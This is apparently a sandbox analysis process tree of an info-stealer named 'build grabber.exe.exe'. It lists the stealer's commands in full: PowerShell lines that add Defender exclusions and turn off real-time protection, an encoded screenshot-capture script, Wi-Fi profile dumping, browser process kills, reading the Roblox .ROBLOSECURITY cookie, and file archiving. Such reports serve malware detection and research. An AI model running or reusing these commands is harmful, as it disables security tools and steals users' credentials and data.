- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
  2⤵
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  2⤵
  PID:540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6252 /prefetch:8
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,4160808181741746826,10485777355059533937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:936
- C:\Users\Admin\Downloads\build grabber.exe.exe
  "C:\Users\Admin\Downloads\build grabber.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4068
- - C:\Users\Admin\Downloads\build grabber.exe.exe
    "C:\Users\Admin\Downloads\build grabber.exe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net session"
      4⤵
      PID:5420
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:5648
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:5664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'"
      4⤵
      PID:5680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:5688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()""
      4⤵
      PID:5696
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()"
        5⤵
        
        PID:6008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5736
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5860
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5176
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:4884
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:6520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6716
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:7144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6500
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
      4⤵
      PID:5192
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5688
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6064
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:6744
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:6164
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5640
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5whcexbb\5whcexbb.cmdline"
        6⤵
        
        PID:5880
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C0.tmp" "c:\Users\Admin\AppData\Local\Temp\5whcexbb\CSCCDC9A9A89C8D4850AF4DDAB8564ED4D6.TMP"
        7⤵
        
        PID:7336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "Camera.exe /devlist"
      4⤵
      PID:7104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6320
    - - C:\Users\Admin\AppData\Local\Temp\_MEI40682\Camera.exe
        
        Camera.exe /devlist
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"
      4⤵
      PID:6592
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5172
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4936
        5⤵
        Kills process with taskkill
        
        PID:5248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
      4⤵
      PID:5808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2468
        5⤵
        Kills process with taskkill
        
        PID:5824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2360"
      4⤵
      PID:6516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2360
        5⤵
        Kills process with taskkill
        
        PID:7336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
      4⤵
      PID:1060
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3428
        5⤵
        Kills process with taskkill
        
        PID:7892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
      4⤵
      PID:5068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 408
        5⤵
        Kills process with taskkill
        
        PID:7056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
      4⤵
      PID:7196
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:8172
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 912
        5⤵
        Kills process with taskkill
        
        PID:6668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"
      4⤵
      PID:5996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2724
        5⤵
        Kills process with taskkill
        
        PID:760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"
      4⤵
      PID:5772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 540
        5⤵
        Kills process with taskkill
        
        PID:636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 776"
      4⤵
      PID:6760
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 776
        5⤵
        Kills process with taskkill
        
        PID:7212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2560"
      4⤵
      PID:7068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2560
        5⤵
        Kills process with taskkill
        
        PID:5484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6116
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:7400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\Y7vHw.zip" *"
      4⤵
      PID:7080
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6204
    - - C:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40682\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\Y7vHw.zip" *
        5⤵
        Executes dropped EXE
        
        PID:6656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6280
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6356
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:2640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6080
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:8124
- C:\Users\Admin\Downloads\build grabber.exe.exe
  "C:\Users\Admin\Downloads\build grabber.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5436
- - C:\Users\Admin\Downloads\build grabber.exe.exe
    "C:\Users\Admin\Downloads\build grabber.exe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5572
  - - C:\Windows\system32\cmd.exe
